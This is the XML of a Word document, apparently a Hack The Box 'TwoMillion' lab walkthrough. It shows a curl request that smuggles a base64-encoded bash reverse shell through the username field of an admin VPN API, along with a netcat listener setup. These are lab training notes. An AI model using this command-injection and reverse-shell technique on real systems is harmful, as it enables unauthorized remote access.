    <w:p w14:paraId="0DBF0432" w14:textId="77777777" w:rsidR="006C70C7" w:rsidRDefault="006C70C7" w:rsidP="006C70C7">
      <w:pPr>
        <w:pStyle w:val="CODE"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7410B812" w14:textId="77777777" w:rsidR="006C70C7" w:rsidRDefault="006C70C7" w:rsidP="006C70C7">
      <w:pPr>
        <w:pStyle w:val="CODE"/>
      </w:pPr>
      <w:r>
        <w:t>curl -X POST http://2million.htb/api/v1/admin/vpn/generate --cookie $PHP_COOKIE --header "Content-Type: application/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>json</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>" --data '{"</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>username":"test</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">"}' </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40727670" w14:textId="77777777" w:rsidR="006C70C7" w:rsidRDefault="006C70C7" w:rsidP="006C70C7">
      <w:pPr>
        <w:pStyle w:val="CODE"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5FD85689" w14:textId="3D4FFF6B" w:rsidR="00436FCD" w:rsidRDefault="00063E84" w:rsidP="00436FCD">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>NETCAT install</w:t>
      </w:r>
      <w:r w:rsidR="00894E82">
        <w:t xml:space="preserve"> for callback listener</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C3FC2A8" w14:textId="335A6BB0" w:rsidR="00063E84" w:rsidRDefault="00063E84" w:rsidP="008E1580">
      <w:pPr>
        <w:pStyle w:val="CODE"/>
      </w:pPr>
      <w:r w:rsidRPr="00063E84">
        <w:t xml:space="preserve">sudo apt-get install -y </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00063E84">
        <w:t>netcat-openbsd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="17AA4693" w14:textId="77777777" w:rsidR="008E1580" w:rsidRDefault="008E1580" w:rsidP="008E1580">
      <w:pPr>
        <w:pStyle w:val="CODE"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="62CCF35C" w14:textId="48D9D486" w:rsidR="0069358D" w:rsidRDefault="0069358D" w:rsidP="007E158B">
      <w:pPr>
        <w:pStyle w:val="CODE"/>
      </w:pPr>
      <w:r w:rsidRPr="0069358D">
        <w:t>echo "bash -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0069358D">
        <w:t>i</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0069358D">
        <w:t xml:space="preserve"> &gt;&amp; /dev/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0069358D">
        <w:t>tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0069358D">
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidR="00CB1D08">
        <w:t xml:space="preserve">&lt;your </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00CB1D08">
        <w:t>ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00CB1D08">
        <w:t xml:space="preserve"> address&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="0069358D">
        <w:t>/1234 0&gt;&amp;1" | base64</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1761BCDA" w14:textId="77777777" w:rsidR="0069358D" w:rsidRDefault="0069358D" w:rsidP="007E158B">
      <w:pPr>
        <w:pStyle w:val="CODE"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="44DAFFAE" w14:textId="6BA0EAEF" w:rsidR="007E158B" w:rsidRDefault="007E158B" w:rsidP="007E158B">
      <w:pPr>
        <w:pStyle w:val="CODE"/>
      </w:pPr>
      <w:r>
        <w:t>curl -X POST http://2million.htb/api/v1/admin/vpn/generate --cookie $PHP_COOKIE --header "Content-Type: application/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>json</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>" --data '{"username":"</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>test;echo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNC4xMi8xMjM0IDA+JjEK | base64 -d | bash;"}'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D2ADBCB" w14:textId="77777777" w:rsidR="00420768" w:rsidRDefault="00420768" w:rsidP="007E158B">
      <w:pPr>
        <w:pStyle w:val="CODE"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="649E1419" w14:textId="675F03AA" w:rsidR="00187431" w:rsidRDefault="00031952" w:rsidP="00995394">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>The next lab will do l</w:t>
      </w:r>
      <w:r w:rsidR="00A65F9F">
        <w:t>ateral movement to an authorized user and escalation to root</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="469AD00D" w14:textId="77777777" w:rsidR="008B6C94" w:rsidRDefault="008B6C94" w:rsidP="008B6C94">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>Additional Thoughts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AD292F4" w14:textId="607D3D14" w:rsidR="00707377" w:rsidRPr="002C42CC" w:rsidRDefault="00D12B83" w:rsidP="008B6C94">
      <w:r>
        <w:rPr>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>Why add 2million.htb to /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>etc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>/hosts? Can</w:t>
      </w:r>
      <w:r w:rsidR="003D7D09">
        <w:rPr>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>’t just use the IP address?  Adding hosts to /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="003D7D09">
        <w:rPr>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>etc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="003D7D09">
        <w:rPr>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>/hosts is general</w:t>
      </w:r>
      <w:r w:rsidR="00125C46">
        <w:rPr>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> good behavior.  Browser</w:t>
      </w:r>
      <w:r w:rsidR="00D24962">
        <w:rPr>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidR="00125C46">
        <w:rPr>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> will use redirect</w:t>
      </w:r>
      <w:r w:rsidR="00D24962">
        <w:rPr>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidR="00125C46">
        <w:rPr>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> to other</w:t>
      </w:r>
      <w:r w:rsidR="000D5127">
        <w:rPr>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> hostnames and without /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="000D5127">
        <w:rPr>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>etc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="000D5127">
        <w:rPr>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">/hosts entries </w:t>
      </w:r>
      <w:r w:rsidR="00BF4CBD">
        <w:rPr>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>requests will fail.</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="00707377" w:rsidRPr="002C42CC" w:rsidSect="003646C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712B8"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="BD667526"/>
    <w:lvl w:ilvl="0" w:tplc="BFBE79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B93ACE"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="47A0315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8D7B55"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="7A3A8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2C73E2"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="A0B6E9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9187671">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="1774545567">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="250243928">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="4" w16cid:durableId="19733690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A2E"/>
    <w:rsid w:val="000002C9"/>
    <w:rsid w:val="0002738B"/>
    <w:rsid w:val="00031952"/>
    <w:rsid w:val="000370A8"/>
    <w:rsid w:val="0004062A"/>
    <w:rsid w:val="00042FB4"/>
    <w:rsid w:val="00063E84"/>
    <w:rsid w:val="000833A9"/>
    <w:rsid w:val="000B31CA"/>
    <w:rsid w:val="000C0104"/>
    <w:rsid w:val="000D0F7D"/>
    <w:rsid w:val="000D5127"/>
    <w:rsid w:val="0010029F"/>
    <w:rsid w:val="001044BA"/>
    <w:rsid w:val="0011442D"/>
    <w:rsid w:val="00125C46"/>
    <w:rsid w:val="001518AE"/>
    <w:rsid w:val="0018204B"/>
    <w:rsid w:val="00187431"/>
    <w:rsid w:val="001B1538"/>
    <w:rsid w:val="001D1BAD"/>
    <w:rsid w:val="001E1D0D"/>
    <w:rsid w:val="001E557B"/>
    <w:rsid w:val="002155EB"/>
    <w:rsid w:val="00223EFE"/>
    <w:rsid w:val="00236D9D"/>
    <w:rsid w:val="00247616"/>
    <w:rsid w:val="00271D76"/>
    <w:rsid w:val="0027205A"/>
    <w:rsid w:val="00273901"/>
    <w:rsid w:val="00285E3F"/>
    <w:rsid w:val="002A3CD0"/>
    <w:rsid w:val="002A7FAF"/>
    <w:rsid w:val="002B2368"/>
    <w:rsid w:val="002C21A1"/>
    <w:rsid w:val="002C42CC"/>
    <w:rsid w:val="002C5B9A"/>
    <w:rsid w:val="002F5F77"/>
    <w:rsid w:val="00330572"/>
    <w:rsid w:val="00355B03"/>
    <w:rsid w:val="00355CB7"/>
    <w:rsid w:val="003646CF"/>
    <w:rsid w:val="0039229C"/>
    <w:rsid w:val="003A1C3C"/>
    <w:rsid w:val="003A5D81"/>
    <w:rsid w:val="003B693B"/>
    <w:rsid w:val="003B738F"/>
    <w:rsid w:val="003D7D09"/>
    <w:rsid w:val="00405A2E"/>
    <w:rsid w:val="00420768"/>
    <w:rsid w:val="00420D3F"/>
    <w:rsid w:val="00436FCD"/>
    <w:rsid w:val="004376F5"/>
    <w:rsid w:val="004517FA"/>
    <w:rsid w:val="00454E9F"/>
    <w:rsid w:val="00476873"/>
    <w:rsid w:val="004C33E2"/>
    <w:rsid w:val="004C3871"/>
    <w:rsid w:val="004E68E7"/>
    <w:rsid w:val="00547366"/>
    <w:rsid w:val="0056187F"/>
    <w:rsid w:val="005D3740"/>
    <w:rsid w:val="005D4C88"/>
    <w:rsid w:val="005D6FA8"/>
    <w:rsid w:val="006458EB"/>
    <w:rsid w:val="006827CA"/>
    <w:rsid w:val="0069358D"/>
    <w:rsid w:val="006C69FF"/>
    <w:rsid w:val="006C70C7"/>
    <w:rsid w:val="006E1C3A"/>
    <w:rsid w:val="006E2D2A"/>
    <w:rsid w:val="006F3B3E"/>
    <w:rsid w:val="006F6E3C"/>
    <w:rsid w:val="0070368D"/>
    <w:rsid w:val="0070620F"/>
    <w:rsid w:val="00707377"/>
    <w:rsid w:val="007107A3"/>
    <w:rsid w:val="00712284"/>
    <w:rsid w:val="00713469"/>
    <w:rsid w:val="007165F5"/>
    <w:rsid w:val="00740EA7"/>
    <w:rsid w:val="00775BC9"/>
    <w:rsid w:val="007929B1"/>
    <w:rsid w:val="007A1589"/>
    <w:rsid w:val="007E158B"/>
    <w:rsid w:val="008331D7"/>
    <w:rsid w:val="00836E67"/>
    <w:rsid w:val="0084096D"/>
    <w:rsid w:val="00855380"/>
    <w:rsid w:val="00855E0A"/>
    <w:rsid w:val="00860C44"/>
    <w:rsid w:val="008704BE"/>
    <w:rsid w:val="0087428B"/>
    <w:rsid w:val="00894E82"/>
    <w:rsid w:val="008A3C74"/>
    <w:rsid w:val="008B6C94"/>
    <w:rsid w:val="008C3937"/>
    <w:rsid w:val="008D1C4A"/>
    <w:rsid w:val="008E1580"/>
    <w:rsid w:val="008E6F9C"/>
    <w:rsid w:val="008E7448"/>
    <w:rsid w:val="00901ECE"/>
    <w:rsid w:val="0090243F"/>
    <w:rsid w:val="00907DEA"/>
    <w:rsid w:val="0093103A"/>
    <w:rsid w:val="00951D26"/>
    <w:rsid w:val="009536CA"/>
    <w:rsid w:val="00971EE5"/>
    <w:rsid w:val="009759F9"/>
    <w:rsid w:val="00995394"/>
    <w:rsid w:val="009A05E3"/>
    <w:rsid w:val="009A0B86"/>
    <w:rsid w:val="009A41D0"/>
    <w:rsid w:val="009D7633"/>
    <w:rsid w:val="009F6F10"/>
    <w:rsid w:val="00A11D14"/>
    <w:rsid w:val="00A35D83"/>
    <w:rsid w:val="00A65F9F"/>
    <w:rsid w:val="00AA77D6"/>
    <w:rsid w:val="00AB0E53"/>
    <w:rsid w:val="00AD612E"/>
    <w:rsid w:val="00AD6DBC"/>
    <w:rsid w:val="00AE773D"/>
    <w:rsid w:val="00B25AF6"/>
    <w:rsid w:val="00B75FED"/>
    <w:rsid w:val="00BA3A24"/>
    <w:rsid w:val="00BA5CD8"/>
    <w:rsid w:val="00BB0F71"/>
    <w:rsid w:val="00BB5368"/>
    <w:rsid w:val="00BB5376"/>
    <w:rsid w:val="00BD3125"/>
    <w:rsid w:val="00BE6F3C"/>
    <w:rsid w:val="00BF0F9F"/>
    <w:rsid w:val="00BF4CBD"/>
    <w:rsid w:val="00C173CA"/>
    <w:rsid w:val="00C55C6E"/>
    <w:rsid w:val="00C723AF"/>
    <w:rsid w:val="00C75ABB"/>
    <w:rsid w:val="00C93AC3"/>
    <w:rsid w:val="00CA0B91"/>
    <w:rsid w:val="00CB1D08"/>
    <w:rsid w:val="00CD7A9B"/>
    <w:rsid w:val="00D02828"/>
    <w:rsid w:val="00D10851"/>
    <w:rsid w:val="00D12B83"/>
    <w:rsid w:val="00D24962"/>
    <w:rsid w:val="00D327E7"/>
    <w:rsid w:val="00D71F8C"/>
    <w:rsid w:val="00D7687A"/>
    <w:rsid w:val="00DB58C7"/>
    <w:rsid w:val="00DC04D2"/>
    <w:rsid w:val="00DC1B82"/>
    <w:rsid w:val="00DC570F"/>
    <w:rsid w:val="00DE718C"/>
    <w:rsid w:val="00E332ED"/>
    <w:rsid w:val="00E64F51"/>
    <w:rsid w:val="00E76A62"/>
    <w:rsid w:val="00E91E36"/>
    <w:rsid w:val="00EA4E5D"/>
    <w:rsid w:val="00EA5F22"/>
    <w:rsid w:val="00EB1D09"/>
    <w:rsid w:val="00ED2840"/>
    <w:rsid w:val="00ED4CA1"/>
    <w:rsid w:val="00F113DD"/>
    <w:rsid w:val="00F1562B"/>
    <w:rsid w:val="00F34211"/>
    <w:rsid w:val="00F6466E"/>
    <w:rsid w:val="00F70415"/>
    <w:rsid w:val="00F9508F"/>
    <w:rsid w:val="00F969B5"/>
    <w:rsid w:val="00FB2099"/>
    <w:rsid w:val="00FB22FE"/>
    <w:rsid w:val="00FC4675"/>
    <w:rsid w:val="00FE0870"/>
    <w:rsid w:val="00FE1F24"/>
    <w:rsid w:val="00FF4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E7117"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{1F894F81-05B9-4994-BD49-605F9E5E7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5A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5A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5A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5A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5A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5A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5A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5A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5A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5A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05A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5A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5A2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5A2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5A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5A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5A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5A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5A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5A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5A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5A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5A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5A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5A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5A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5A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5A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5A2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75BC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5BC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D6DBC"/>
    <w:rPr>
      <w:color w:val="96607D" w:themeColor="followedHyperlink"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="CODE">
    <w:name w:val="CODE"/>
    <w:basedOn w:val="Normal"/>
    <w:qFormat/>
    <w:rsid w:val="002C21A1"/>
    <w:pPr>
      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      <w:ind w:left="360"/>
    </w:pPr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43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0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8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7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help.hackthebox.com/en/articles/5185687-introduction-to-lab-access" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image5.tmp"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://app.hackthebox.com/machines/TwoMillion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1597</TotalTime>
  <Pages>8</Pages>
  <Words>568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Graf</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Ken Graf</cp:lastModifiedBy>
  <cp:revision>92</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2024-07-07T13:40:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-09-07T12:31:00Z</dcterms:modified>
</cp:coreProperties>
</file>